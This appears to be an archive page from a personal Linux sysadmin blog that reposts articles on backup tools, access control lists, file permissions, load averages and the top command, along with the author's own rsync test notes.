Saturday, August 22, 2009

Ten essential backup tools for Linux

SkyHi @ Saturday, August 22, 2009
A reliable backup tool is an essential — and finding one with the features you want need not cost a fortune, says Jack Wallen.

Whether you work in IT or you are a computer power user at home, you need a backup tool. It should allow you to make scheduled, one-time, local and remote backups, along with other tasks.

Plenty of proprietary solutions exist. Some are minimal and cost-effective, while others are feature-rich and expensive.

The open-source community also has plenty to offer in terms of backup software. Here are 10 excellent utilities for the Linux operating system — in fact, some of these are cross-platform and will back up Linux, Windows and Mac.

1. Fwbackups
Fwbackups is by far the easiest of all the Linux backup options to use. It is cross-platform, has a user-friendly interface and can do single or recurring scheduled backups.

The fwbackups tool allows you to do backups either locally or remotely in tar, tar.gz, tar.bz2 or rsync format. You can back up an entire computer or a single file.

Unlike many backup utilities, fwbackups is easy to install because it will probably be found in your distribution's repository. Both backing up and restoring are incredibly easy — as is scheduling a remote, recurring scheduled backup. You can also perform incremental or differential backups to speed up the process.

2. Bacula
Bacula is a powerful backup utility and one of the few Linux open-source backup tools to be truly enterprise-ready. But with that comes a level of complexity you might not find in other backup software. Unlike many other utilities, Bacula contains a number of components:

1. Director: The application that supervises all of Bacula
2. Console: This is how you communicate with the Bacula Director
3. File: This is the application that is installed on the machine to be backed up
4. Storage: This application performs the reading/writing to your storage space
5. Catalog: This application is responsible for the databases used
6. Monitor: Allows the administrator to keep track of the status of the various Bacula tools

Bacula is not the easiest backup utility to configure and use, but it is one of the most powerful. So if you are looking for power and are not concerned about putting in the time to familiarise yourself with configuration, Bacula is the tool for you.

3. Rsync
Rsync is one of the most widely used Linux backup utilities. With rsync, you can do flexible incremental backups, either locally or remotely.


Rsync can update whole directory trees and file systems; preserve links, ownerships, permissions and privileges; use rsh, ssh or direct sockets for connection; and support anonymous connections.

Rsync is a command-line tool, although front-ends are available, such as Grsync. But the front-ends negate the flexibility of having a simple command-line backup tool.

One of the biggest pluses of using a command-line tool is that you can create simple scripts to use, in conjunction with cron, to create automated backups. For this, rsync is perfect.
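As a rough illustration, a nightly rsync backup script driven by cron might look like the following sketch (host name and paths are hypothetical):

#!/bin/sh
# backup.sh - mirror /home to a remote backup host over ssh
# -a preserves permissions, times, links and ownership; -z compresses in transit;
# --delete makes the destination an exact mirror of the source
rsync -az --delete -e ssh /home/ backupserver:/backup/home/

A matching crontab entry to run it every night at 01:30 would be:

30 1 * * * /root/backup.sh >> /var/log/backup-rsync.log 2>&1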

4. Mondo Rescue
Mondo Rescue is one of those tools you keep around for disaster recovery, because one of its strengths is backing up an entire installation. Another strength of Mondo Rescue is that it can back up to nearly any medium, including CD, DVD, tape, NFS and hard disk.

Mondo Rescue also supports LVM 1/2, RAID, ext2, ext3, ext4, JFS, XFS, ReiserFS and VFAT. If your file system is not listed, there is a call on the Mondo website to email the developers for a file system request and they will make it work.

Mondo Rescue is used by large companies, such as Lockheed Martin, so you know it is reliable.

5. Simple Backup Solution
Simple Backup Solution is primarily targeted at desktop backup. It can back up files and directories, and allows regular expressions to be used for exclusion purposes.

Because Simple Backup Solution uses compressed archives, it is not the best option for backing up large amounts of pre-compressed data, such as multimedia files. One of the beauties of this tool is that it includes predefined backup solutions that can be used to back up directories, such as /var/, /etc/ and /usr/local.

SBS is not limited to predefined backups. You can also perform custom, manual and scheduled backups, and the interface is user-friendly.

One of the downsides of SBS is that it does not include a restore feature, such as the one found in fwbackups.

6. Amanda
Amanda allows an administrator to set up a single backup server and back up multiple hosts to it. It is robust, reliable and flexible. Amanda uses native Linux dump or tar to facilitate the backup process.

One useful feature is that Amanda can use Samba to back up Windows clients to the same Amanda server. It is important to note that with Amanda, there are separate applications for server and client.

For the server, only Amanda is needed. For the client, the Amanda-client application must be installed.

7. Arkeia
Arkeia is one of the big boys in the backup industry. If you are looking for enterprise-level backup-restore tools — and even replication server solutions — and do not mind paying a premium, Arkeia is a strong candidate.

If you are wondering about price, the Arkeia starter pack costs $1,300 (£800), which should indicate the seriousness of this package.

Although Arkeia says it has small to medium-sized versions, it is best suited for larger businesses and enterprise-level needs.

8. Back In Time
Back In Time allows you to take snapshots of predefined directories and can do so to a schedule. This tool has an outstanding interface and integrates well with Gnome and KDE.

Back In Time does a great job of creating dated snapshots that will serve as backups. However, it does not use any compression for the backups, nor does it include an automated restore tool. It is a desktop-only tool.

9. Box Backup
Box Backup is unusual in that it is not only fully automated, but can also use encryption to secure backups.


It uses both a client and a server daemon, as well as a restore utility. The utility uses SSL certificates to authenticate clients, so connections are secure.

Although Box Backup is a command-line utility, it is simple to configure and deploy. Data directories are configured, the daemon scans those directories and if new data is found, it is uploaded to the server.

There are three components to install — the bbstored backup server daemon, the bbackupd client daemon and the bbackupquery backup query and restore tool. Box Backup is available for Linux, OpenBSD, Windows, NetBSD, FreeBSD, Darwin and Solaris.

10. Kbackup
Kbackup is a simple utility that backs up locally to any media that can be written to. It is designed to be a backup tool that any user can take advantage of.

To that end, it is simple and does not have a long list of features. Apart from being able to back up files and directories, its only other feature allows users to save backup profiles that can be opened and backed up quickly.

Kbackup creates its backups in tar format, so restoring one is as simple as unpacking the archive with Ark or another graphical front-end.

Backup of choice?
If we have overlooked your favourite Linux backup, tell us what it is and how you deployed it.




Reference: http://resources.zdnet.co.uk/articles/comment/0,1000002985,39718160,00.htm

Friday, August 21, 2009

To use Clonezilla to save a disk, the source disk must be unmounted

SkyHi @ Friday, August 21, 2009
http://www.google.ca/#hl=en&source=hp&q=clonezilla+to+use+clonezilla+to+save+or+clone+a+disk%2C+the+source+disk+must+be+unmounted&btnG=Google+Search&meta=&aq=f&fp=79108af2917f27da


http://drbl.sourceforge.net/faq/fine-print.php?path=./2_System/23_Missing_OS.faq

Linux getfacl setfacl Using Access Control Lists

SkyHi @ Friday, August 21, 2009
This sample chapter explains common Linux partitioning options so you can determine which is best for you. It also discusses how to use access control lists to limit access to filesystems, as well as how to enforce disk usage limits known as quotas.
Using Access Control Lists

On an ext3 filesystem, read, write, and execute permissions can be set for the owner of the file, the group associated with the file, and for everyone else who has access to the filesystem. These permissions are visible with the ls -l command. Refer to Chapter 4, “Understanding Linux Concepts,” for information on reading standard file permissions.

In most cases, these standard file permissions along with restricted access to mounting filesystems are all that an administrator needs to grant file privileges to users and to prevent unauthorized users from accessing important files. However, when these basic file permissions are not enough, access control lists, or ACLs, can be used on an ext3 filesystem.

ACLs expand the basic read, write, and execute permissions to more categories of users and groups. In addition to permissions for the owner and group associated with the file, ACLs allow permissions to be set for any user, any user group, and for all users not in the group associated with the file. An effective rights mask, which is explained later, can also be set to restrict permissions.

To use ACLs on the filesystem, the acl package must be installed. If it is not already installed, install it via Red Hat Network as discussed in Chapter 3.
Enabling ACLs

To use ACLs, they must be enabled when an ext3 filesystem is mounted. This is most commonly enabled as an option in /etc/fstab. For example:

LABEL=/share /share ext3 acl 1 2

If the filesystem can be unmounted and remounted while the system is still running, modify /etc/fstab for the filesystem, unmount it, and remount it so the changes to /etc/fstab take effect. Otherwise, the system must be rebooted to enable ACLs on the desired filesystems.

If you are mounting the filesystem via the mount command instead, use the -o acl option when mounting:

mount -t ext3 -o acl <device> <mount point>
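If the filesystem is already mounted, a remount can switch ACL support on in place; a quick sketch assuming a hypothetical /share mount point:

# mount -o remount,acl /share
# mount | grep /share     (acl should now appear in the option list)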

Setting and Modifying ACLs

There are four categories of ACLs per file: for an individual user, for a user group, via the effective rights mask, and for users not in the user group associated with the file. To view the existing ACLs for a file, execute the following:

getfacl <file>

If ACLs are enabled, the output should look similar to Listing 7.10.
Listing 7.10. Viewing ACLs

# file: testfile
# owner: tfox
# group: tfox
user::rwx
group::r-x
mask::rwx
other::r-x

To set or modify existing ACLs, use the following syntax:

setfacl -m <rules> <files>

Other useful options include --test to show the results of the command but not change the ACL and -R to apply the rules recursively.

Replace <files> with one or more space-separated file or directory names. Rules can be set for four different rule types. Replace <rules> with one or more of the following, and replace <perms> in these rules with one or more of r, w, and x (which stand for read, write, and execute):

* For an individual user:

u:<username>:<perms>

* For a specific user group:

g:<groupname>:<perms>

* For users not in the user group associated with the file:

o:<perms>

* Via the effective rights mask:

m:<perms>

The first three rule types (individual user, user group, or users not in the user group for the file) are pretty self-explanatory. They allow you to give read, write, or execute permissions to users in these three categories. A user or group ID may be used, or the actual username or group name.

CAUTION

If the actual username or group name is used to set an ACL, the UID or GID for it is still used to store the ACL. If the UID or GID for a user or group name changes, the ACLs are not changed to reflect the new UID or GID.

But, what is the effective rights mask? The effective rights mask restricts the ACL permission set allowed for users or groups other than the owner of the file. The standard file permissions are not affected by the mask, just the permissions granted by using ACLs. In other words, if the permission (read, write, or execute) is not in the effective rights mask, it appears in the ACLs retrieved with the getfacl command, but the permission is ignored. Listing 7.11 shows an example of this where the effective rights mask is set to read-only, meaning the read-write permissions for user brent and the group associated with the file are effectively read-only. Notice the comment to the right of the ACLs affected by the effective rights mask.
Listing 7.11. Effective Rights Mask

# file: testfile
# owner: tammy
# group: tammy
user::rw-
user:brent:rw- #effective:r--
group::rw- #effective:r--
mask::r--
other::rw-

The effective rights mask must be set after the ACL rule types. When an ACL for an individual user (other than the owner of the file) or a user group is added, the effective rights mask is automatically recalculated as the union of all the permissions for all users other than the owner and all groups including the group associated with the file. So, to make sure the effective rights mask is not modified after setting it, set it after all other ACL permissions.

If the ACL for one of these rule types already exists for the file or directory, the existing ACL for the rule type is replaced, not added to. For example, if user 605 already has read and execute permissions to the file, after the u:605:w rule is implemented, user 605 only has write permissions.
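Putting the rule syntax together, here is a short hypothetical session on a file named testfile (the user and group names are made up):

# setfacl -m u:brent:rw testfile     (read-write for user brent)
# setfacl -m g:admins:rx testfile    (read-execute for group admins)
# setfacl -m m:rw testfile           (set the effective rights mask last)
# getfacl testfile                   (verify the resulting ACLs)

As discussed above, the mask is recalculated whenever a user or group rule is added, which is why it is set last here.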
Setting Default ACLs

Two types of ACLs can be used: access ACLs, and default ACLs. So far, this chapter has only discussed access ACLs. Access ACLs are set for individual files and directories. Directories, and directories only, can also have default ACLs, which are optional. If a directory has a default ACL set for it, any file or directory created in the directory with default ACLs will inherit the default ACLs. If a file is created, the access ACLs are set to what the default ACLs are for the parent directory. If a directory is created, the access ACLs are set to what the default ACLs are for the parent directory and the default ACLs for the new directory are set to the same default ACLs as the parent directory.

To set the ACL as a default ACL, prepend d: to the rule such as d:g:500:rwx to set a default ACL of read, write, and execute for user group 500. If any default ACL exists for the directory, the default ACLs must include a user, group, and other ACL at a minimum as shown in Listing 7.12.
Listing 7.12. Default ACLs

# file: testdir
# owner: tfox
# group: tfox
user::rwx
group::r-x
mask::rwx
other::r-x
default:user::rwx
default:group::r-x
default:other::r--

If a default ACL is set for an individual user other than the file owner or for a user group other than the group associated with the file, a default effective rights mask must also exist. If one is not implicitly set, it is automatically calculated as with access ACLs. The same rules apply for the default ACL effective rights mask: It is recalculated after an ACL for any user other than the owner is set or if an ACL for any group including the group associated with the file is set, meaning it should be set last to ensure it is not changed after being set.
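For instance, the following hypothetical commands give group 500 a default ACL on the directory testdir, then confirm that a newly created file inherits it:

# setfacl -m d:g:500:rwx testdir
# touch testdir/newfile
# getfacl testdir/newfile    (the output should list group 500 among the access ACLs)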
Removing ACLs

The setfacl -x command can be used to remove ACL permissions by ACL rule type. The <rules> for this command use the same syntax as the setfacl -m command except that the <perms> field is omitted because all rules for the rule type are removed.

It is also possible to remove all ACLs for a file or directory with:

setfacl --remove-all <files>

To remove all default ACLs for a directory:

setfacl --remove-default <directory>

Preserving ACLs

The NFS and Samba file sharing clients in Red Hat Enterprise Linux recognize and use any ACLs associated with the files shared on the server. If your NFS or Samba clients are not running Red Hat Enterprise Linux, be sure to ask the operating system vendor about ACL support or test your client configuration for support.

The mv command to move files preserves the ACLs associated with the file. If it can’t for some reason, a warning is displayed. However, the cp command to copy files does not preserve ACLs.

The tar and dump commands also do not preserve the ACLs associated with files or directories and should not be used to back up or archive files with ACLs. To back up or archive files while preserving ACLs use the star utility. For example, if you are moving a large number of files with ACLs, create an archive of all the files using star, copy the star archive file to the new system or directory, and unarchive the files. Be sure to use getfacl to verify that the ACLs are still associated with the files. The star RPM package must be installed to use the utility. Refer to Chapter 3 for details on package installation via Red Hat Network. The star command is similar to tar. Refer to its man page with the man star command for details.
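A hedged sketch of that star workflow, assuming star's -acl option and its tar-style f= archive syntax:

# star -c -acl f=files.star /shared/project     (create an archive, keeping ACLs)
# scp files.star newhost:/tmp/
# star -x -acl f=/tmp/files.star                (unpack on the new system)
# getfacl /shared/project/somefile              (verify the ACLs survived)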





Reference:http://www.informit.com/articles/article.aspx?p=725218&seqNum=5

Linux Permission

SkyHi @ Friday, August 21, 2009
[root@web html]# find silver.com -type f -exec chmod 644 {} \;

[root@web html]# find silver.com -type d -exec chmod 2755 {} \;


[root@web home]# ls -tlrh
total 520K
-rw-r--r-- 1 user1 group1 1.2K Jun 9 12:42 README
-rw-r--r-- 1 user1 group1 2.3K Jun 9 12:42 index.php
-rw-r--r-- 1 user1 group1 202K Jul 23 12:43 logo.psd
-rw-r--r-- 1 user1 group1 281K Jul 23 14:37 top_nav.psd
drwxr-sr-x 5 user1 group1 4.0K Jul 28 11:51 vendors
drwxr-sr-x 6 user1 group1 4.0K Jul 28 11:52 cake
drwxr-sr-x+ 12 user1 group1 4.0K Aug 11 16:25 app
[root@web home]# ls -l
total 520
drwxr-sr-x+ 12 user1 group1 4096 Aug 11 16:25 app
drwxr-sr-x 6 user1 group1 4096 Jul 28 11:52 cake
-rw-r--r-- 1 user1 group1 2311 Jun 9 12:42 index.php
-rw-r--r-- 1 user1 group1 206458 Jul 23 12:43 logo.psd
-rw-r--r-- 1 user1 group1 1158 Jun 9 12:42 README
-rw-r--r-- 1 user1 group1 286913 Jul 23 14:37 top_nav.psd
drwxr-sr-x 5 user1 group1 4096 Jul 28 11:51 vendors
[root@web home]# getfacl app
# file: app
# owner: user1
# group: group1
user::rwx
group::r-x
other::r-x
default:user::rwx
default:group::rwx
default:other::rwx

[root@web home]# getfacl cake
# file: cake
# owner: user1
# group: group1
user::rwx
group::r-x
other::r-x

//-R recursive
[root@web home]# setfacl --remove-default app/

[root@web home]# getfacl app/
# file: app
# owner: user1
# group: group1
user::rwx
group::r-x
other::r-x

About Linux Processor load average

SkyHi @ Friday, August 21, 2009
About Linux Processor loadavgs

Processor load averages are those numbers you get when you use the uptime command. Three loadavgs are returned. Each is the result of performing the computation with a different half life.

On a normal user's Linux box, the load average is usually something pretty low, such as 0.03. This means that on average there are 0.03 processes ready to run at any one time.

The loadavg can be compared to a "percentage of CPU used" metric as found, for example, in the Windows NT Task Manager. However, whilst a CPU percentage measure can only go up to 100% (or 1.00 on the loadavg scale), the loadavg can go arbitrarily high. The reason for this is that the loadavg measures the average number of processes that are ready to run, rather than the average number that are actually running. Obviously, you can only have a maximum of one running process per processor at any given instant.

On an asynchronous server (one that is not interacting directly with users; for example, a mail server or upstream news server), it might be desirable to have the loadavg at 1.00 (call it perfectly loaded). This means that no processor capacity is wasted (or more specifically, no money has been wasted buying a fast processor that is not being used), but the system is not overloaded. It is possible to use loadavgs to determine if this is the case, whereas a simple "percentage of CPU used" metric cannot distinguish between an overloaded and perfectly loaded server. (actually this is not true - processes can be ready to run even if they can't immediately use the CPU, I think)
Calculating loadavgs

Loadavg values use an exponentially-weighted average, with increasingly smaller weights over a (theoretically) infinite period of time extending from the present into the past. More recent measurements have larger weight than previous readings.

The theoretical calculation of the load average is as follows:

We have the following values:

1. A (possibly infinite) series of readings labelled x_n, where n starts at 0 for the most recent reading and increases into the past. Readings before the start of the "universe" (in the case of a unix processor loadavg, before the machine was booted) should be set to 0.
2. A decay factor, d, satisfying 0 < d < 1

Then, we can define the loadavg at time t as follows:

L_t = \sum_{n=0}^{\infty} d^n (1 - d)\, x_{n+t}

For practical calculation, note that the present loadavg can be computed iteratively from the present reading x_0, the decay factor and the loadavg of the previous period as follows:

L_t = (1 - d)\, x_0 + d\, L_{t-1}

The initial value of L should be set to 0.

This permits the loadavg to be computed very efficiently on an ongoing basis with only a small, fixed amount of data.
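A minimal sketch of the iterative formula in awk, assuming one reading per line on standard input and a decay factor of 0.9:

awk -v d=0.9 '
BEGIN { L = 0 }                             # initial loadavg is 0
{ L = (1 - d) * $1 + d * L                  # fold the newest reading into the average
  printf "reading=%s loadavg=%.2f\n", $1, L }'

Feeding it a burst of 1s followed by 0s shows the characteristic exponential rise and decay.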

Decay factors have a length of time associated with them, called the half life. This is the period of time it takes for the loadavg to halve in value if all future input values are 0. No matter what the particular value of the loadavg is at the start of the decay, the time taken for it to half, and hence the length of the half life, is constant.

Some approximate values of half-life are given below:
Decay constants and their associated half-lives:

Decay constant d    Half life
0.5                 1
0.25                <1
0.75                2.5
0.1                 <<1
0.9                 7
0.95                14
0.965               20

Anyone who has studied A-level physics should find the concept of half-lives familiar.
How the linux kernel actually computes the loadavg

As mentioned at the start of this document, linux provides three load averages, with different decay constants and half lifes. The relevant values are listed in the following table:
Standard decay values in sched.h:

Loadavg    Decay time (not half life)    Kernel constant    Decay constant d
1 min      12 periods                    1884               ~0.92 (1884/2048)
5 min      60 periods                    2014               ~0.983 (2014/2048)
15 min     180 periods                   2037               ~0.995 (2037/2048)

The code is defined in sched.c and sched.h.

Loadavgs are stored in the three element array avenrun[] as fixed point numbers, with 11 bits for the fractional part. That means, to convert an integer i into this representation, write i<<11 and to extract the integer part from a number in this fractional form, write i>>11.
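As a hedged illustration, the 1-minute update can be reproduced in shell integer arithmetic using the kernel constant 1884 (2048 represents 1.0 in this fixed-point scheme):

L=0                                   # loadavg, fixed point with 11 fractional bits
n=$(( 2 << 11 ))                      # reading: 2 active tasks, converted to fixed point
L=$(( (L * 1884 + n * (2048 - 1884)) >> 11 ))
echo "integer part: $(( L >> 11 ))"   # extract the integer part as described above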

Readings are taken every 5 seconds, by calling the count_active_tasks() function. This counts the number of tasks that are running, swapping or uninterruptible.


Reference: http://www.hawaga.org.uk/ben/tech/loadavg.html





http://en.wikipedia.org/wiki/Unix_load_average
In UNIX computing, the system load is a measure of the amount of work that a computer system performs. The load average represents the average system load over a period of time. It conventionally appears in the form of three numbers which represent the system load during the last one-, five-, and fifteen-minute periods.

Unix-style load calculation

All Unix and Unix-like systems generate a metric of three "load average" numbers in the kernel. Users can easily query the current result from a Unix shell by running the uptime command:

$ uptime
09:53:15 up 119 days, 19:08, 10 users, load average: 3.73 7.98 0.50

The w and top commands show the same three load average numbers, as do a range of graphical user interface utilities.

An idle computer has a load number of 0 and each process using or waiting for CPU adds to the load number by 1. Most UNIX systems count only processes in the running (on CPU) or runnable (waiting for CPU) states. However, Linux also includes processes in uninterruptible sleep states (usually waiting for disk activity), which can lead to markedly different results if many processes remain blocked in I/O due to a busy or stalled I/O system. This, for example, includes processes blocking due to an NFS server failure or to slow media (e.g., USB 1.x storage devices). Such circumstances can result in an elevated load average, which does not reflect an actual increase in CPU use (but still gives an idea on how long users have to wait).

Systems calculate the load average as the exponentially damped/weighted moving average of the load number. The three values of load average refer to the past one, five, and fifteen minutes of system operation.

For single-CPU systems that are CPU-bound, one can think of load average as a percentage of system utilization during the respective time period. For systems with multiple CPUs, one must divide the number by the number of processors in order to get a comparable percentage.
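A quick hedged one-liner performing that division for the one-minute figure on Linux:

$ awk -v n=$(grep -c ^processor /proc/cpuinfo) '{ printf "load per CPU = %.2f\n", $1 / n }' /proc/loadavg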

For example, one can interpret a load average of "1.73 0.50 7.98" on a single-CPU system as:

* during the last minute, the CPU was overloaded by 73% (1 CPU with 1.73 runnable processes, so that 0.73 processes had to wait for a turn)
* during the last 5 minutes, the CPU was underloaded 50% (no processes had to wait for a turn)
* during the last 15 minutes, the CPU was overloaded 698% (1 CPU with 7.98 runnable processes, so that 6.98 processes had to wait for a turn)

This means that this CPU could have handled all of the work scheduled for the last minute if it were 1.73 times as fast, or if there were two (1.73 rounded up) times as many CPUs, but that over the last five minutes it was twice as fast as necessary to prevent runnable processes from waiting their turn.

In a system with four CPUs, a load average of 3.73 would indicate that there were, on average, 3.73 processes ready to run, and each one could be scheduled into a CPU.

On modern UNIX systems, the treatment of threading with respect to load averages varies. Some systems treat threads as processes for the purposes of load average calculation: each thread waiting to run will add 1 to the load. However, other systems, especially systems implementing so-called M:N threading, use different strategies, such as counting the process exactly once for the purpose of load (regardless of the number of threads), or counting only threads currently exposed by the user-thread scheduler to the kernel, which may depend on the level of concurrency set on the process.

Many systems generate the load average by sampling the state of the scheduler periodically, rather than recalculating on all pertinent scheduler events. They adopt this approach for performance reasons, as scheduler events occur frequently, and scheduler efficiency impacts significantly on system efficiency. As a result, sampling error can lead to load averages inaccurately representing actual system behavior. This can pose a particular problem for programs that wake up at a fixed interval that aligns with the load-average sampling, in which case a process may be under- or over-represented in the load average numbers.

Load average is not CPU utilization

Even though the previous section relates CPU capacity to load average, load average does not measure the CPU utilization of processes. The numbers it produces are derived from the load queue of processes, that is, how many processes are running or waiting to run, not from how intensively each process uses the CPU.[1] The same reference suggests that load average is not a vital piece of performance information until a system's CPU approaches 100% utilization. At levels close to 100%, load average can be very significant for judging system performance, but even then it gives direct information about process queue length, not about CPU utilization.

CPU load vs CPU utilization

A comparative study of different load indices carried out by Domenico et al.[1] reported that CPU load information based upon the CPU queue length does much better in load balancing compared to CPU utilization. The reason CPU queue length did better is probably because, when a host is heavily loaded, its CPU utilization is likely to be close to 100% and it is unable to reflect the exact load level of the utilization. In contrast, CPU queue lengths can directly reflect the amount of load on a CPU. As an example, two systems, one with 3 and the other with 6 processes in the queue, will probably have utilizations close to 100% although they obviously differ.

Reference: http://en.wikipedia.org/wiki/Unix_load_average

Linux TOP command

SkyHi @ Friday, August 21, 2009
The Linux top command is the command-line equivalent of Task Manager in Windows.
Question / Scenario:

How do I determine CPU and memory utilization, based on running processes?
Answer / Solution:

Use the top command in Linux.
TOP

The top command provides a real-time look at what is happening with your system. Top produces so much output that a new user may get overwhelmed with all that's presented and what it means.

Let's take a look at top one line at a time. The server has been flooded with http requests to create some load on the server.

top output:

top - 22:09:08 up 14 min, 1 user, load average: 0.21, 0.23, 0.30
Tasks: 81 total, 1 running, 80 sleeping, 0 stopped, 0 zombie
Cpu(s): 9.5%us, 31.2%sy, 0.0%ni, 27.0%id, 7.6%wa, 1.0%hi, 23.7%si, 0.0%st
Mem: 255592k total, 167568k used, 88024k free, 25068k buffers
Swap: 524280k total, 0k used, 524280k free, 85724k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3166 apache 15 0 29444 6112 1524 S 6.6 2.4 0:00.79 httpd
3161 apache 15 0 29444 6112 1524 S 5.9 2.4 0:00.79 httpd
3164 apache 15 0 29444 6112 1524 S 5.9 2.4 0:00.75 httpd
3169 apache 15 0 29444 6112 1524 S 5.9 2.4 0:00.74 httpd
3163 apache 15 0 29444 6112 1524 S 5.6 2.4 0:00.76 httpd
3165 apache 15 0 29444 6112 1524 S 5.6 2.4 0:00.77 httpd
3167 apache 15 0 29444 6112 1524 S 5.3 2.4 0:00.73 httpd
3162 apache 15 0 29444 6112 1524 S 5.0 2.4 0:00.77 httpd
3407 root 16 0 2188 1012 816 R 1.7 0.4 0:00.51 top
240 root 15 0 0 0 0 S 0.3 0.0 0:00.08 pdflush
501 root 10 -5 0 0 0 S 0.3 0.0 0:01.20 kjournald
2794 root 18 0 12720 1268 560 S 0.3 0.5 0:00.73 pcscd
1 root 15 0 2060 636 544 S 0.0 0.2 0:03.81 init
2 root RT -5 0 0 0 S 0.0 0.0 0:00.00 migration/0
3 root 34 19 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
4 root RT -5 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
5 root 10 -5 0 0 0 S 0.0 0.0 0:00.07 events/0

The first line in top:

top - 22:09:08 up 14 min, 1 user, load average: 0.21, 0.23, 0.30

“22:09:08″ is the current time; “up 14 min” shows how long the system has been up for; “1 user” how many users are logged in; “load average: 0.21, 0.23, 0.30″ the load average of the system (1minute, 5 minutes, 15 minutes).

Load average is an extensive topic and understanding its inner workings can be daunting. The simplest of definitions states that load average is the CPU utilization over a period of time. A load average of 1 means your CPU is being fully utilized and processes are not having to wait to use a CPU. A load average above 1 indicates that processes need to wait and your system will be less responsive. If your load average is consistently above 3 and your system is running slow, you may want to upgrade to more CPUs or a faster CPU.

The second line in top:

Tasks: 82 total, 1 running, 81 sleeping, 0 stopped, 0 zombie

Shows the number of processes and their current state.

The third line in top:

Cpu(s): 9.5%us, 31.2%sy, 0.0%ni, 27.0%id, 7.6%wa, 1.0%hi, 23.7%si, 0.0%st

Shows CPU utilization details. “9.5%us” user processes are using 9.5%; “31.2%sy” system processes are using 31.2%; “27.0%id” percentage of available CPU; “7.6%wa” time the CPU is waiting for IO.

When first analyzing the Cpu(s) line in top look at the %id to see how much cpu is available. If %id is low then focus on %us, %sy, and %wa to determine what is using the CPU.

The fourth and fifth lines in top:

Mem: 255592k total, 167568k used, 88024k free, 25068k buffers
Swap: 524280k total, 0k used, 524280k free, 85724k cached

Describes the memory usage. These numbers can be misleading. “255592k total” is total memory in the system; “167568K used” is the part of the RAM that currently contains information; “88024k free” is the part of RAM that contains no information; “25068K buffers and 85724k cached” is the buffered and cached data for IO.

So what is the actual amount of free RAM available for programs to use ?

The answer is: free + (buffers + cached)

88024k + (25068k + 85724k) = 198816k

How much RAM is being used by progams ?

The answer is: used - (buffers + cached)

167568k - (25068k + 85724k) = 56776k
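The same arithmetic can be pulled straight out of the free command; a hedged one-liner, assuming the traditional layout with buffers and cached in columns six and seven:

$ free | awk '/^Mem:/ { printf "really used: %dk, really free: %dk\n", $3 - $6 - $7, $4 + $6 + $7 }'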

The processes information:

Top displays processes in descending order of CPU usage. Let's describe each column that represents a process.

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3166 apache 15 0 29444 6112 1524 S 6.6 2.4 0:00.79 httpd

PID - process ID of the process

USER - User who is running the process

PR - The priority of the process

NI - Nice value of the process (higher value indicates lower priority)

VIRT - The total amount of virtual memory used

RES - Resident task size

SHR - Amount of shared memory used

S - State of the task. Values are S (sleeping), D (uninterruptible sleep), R (running), Z (zombies), or T (stopped or traced)

%CPU - Percentage of CPU used

%MEM - Percentage of Memory used

TIME+ - Total CPU time used

COMMAND - Command issued
Interacting with TOP

Now that we are able to understand the output from top, let's learn how to change the way the output is displayed.

Just press the following key while running top and the output will be sorted in real time.

M - Sort by memory usage

P - Sort by CPU usage

T - Sort by cumulative time

z - Color display

k - Kill a process

q - quit

If we want to kill the process with PID 3161, press “k”, and when the prompt asks for the PID number, enter 3161.
Command Line Parameters with TOP

You can control what top displays by issuing parameters when you run top.

-d - Controls the delay between refreshes

-p - Specify the process by PID that you want to monitor

-n - Update the display this number of times and then exit

If we want to monitor only the httpd process with a PID of 3166:

$ top -p 3166

If we want to change the delay between refreshes to 5 seconds

$ top -d 5
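top also has a batch mode that is handy in scripts and logs; for example, to capture a single snapshot of the header and the busiest processes:

$ top -b -n 1 | head -15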

Referece: http://www.kernelhardware.org/linux-top-command/

rsync test tutorial

SkyHi @ Friday, August 21, 2009
###initialize this script on the destination host
#rsync -u -v -r --bwlimit=2000 root@backupserver:/backup2/ns1.home.com /mnt/sda/ns1.home.com

##Archive 2 directories(html and test1) to /mnt/sda
#cd /mnt/sda
#tar cvf /mnt/sda/backup2009.rar /var/www/html /var/www/test1


Test 2: LOCAL MACHINE SYNC

[root@jud sda]# mkdir -p home/ftp

[root@jud ftp]# pwd
/mnt/sda/home/ftp


###source
[root@jud vista_temp]# touch derek.test
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:23 derek.test


###vista_temp will be created in destination /mnt/sda/home/ftp/vista_temp
[root@jud sda]# cat rsyncvista_temp.sh
rsync --bwlimit=200 -v -z -r -L -t /home/ftp/vista_temp /mnt/sda/home/ftp >> /mnt/sda/vista_temp.log


###destination
[root@jud ftp]# cd vista_temp/
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.test



Test 3: add --delete //delete extraneous files from dest dirs

[root@jud vista_temp]# touch derek.new
[root@jud vista_temp]# rm derek.test
rm: remove regular empty file `derek.test'? y
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.new



[root@jud sda]# cat rsyncvista_tempdelete.sh
rsync --bwlimit=200 -v -z -r -L -t --delete /home/ftp/vista_temp /mnt/sda/home/ftp >> /mnt/sda/vista_temp.log


###Source intact
[root@jud vista_temp]# pwd
/home/ftp/vista_temp
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.new
-rw-r--r-- 1 root root 0 Jan 29 11:23 derek.test


###destination updated
[root@jud vista_temp]# pwd
/mnt/sda/home/ftp/vista_temp
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.new


##check log
[root@jud sda]# cat vista_temp.log
building file list ... done
building file list ... done
vista_temp/
vista_temp/derek.test

sent 112 bytes received 48 bytes 320.00 bytes/sec
total size is 0 speedup is 0.00
building file list ... done
deleting vista_temp/derek.test
vista_temp/
vista_temp/derek.new

sent 115 bytes received 48 bytes 326.00 bytes/sec
total size is 0 speedup is 0.00









# man rsync

EXAMPLES
Here are some examples of how I use rsync.

To backup my wife's home directory, which consists of large MS Word files and mail
folders, I use a cron job that runs

rsync -Cavz . arvidsjaur:backup

each night over a PPP connection to a duplicate directory on my machine "arvidsjaur".

To synchronize my samba source trees I use the following Makefile targets:

get:
rsync -avuzb --exclude '*~' samba:samba/ .
put:
rsync -Cavuzb . samba:samba/
sync: get put

this allows me to sync with a CVS directory at the other end of the connection. I
then do CVS operations on the remote machine, which saves a lot of time as the remote
CVS protocol isn't very efficient.

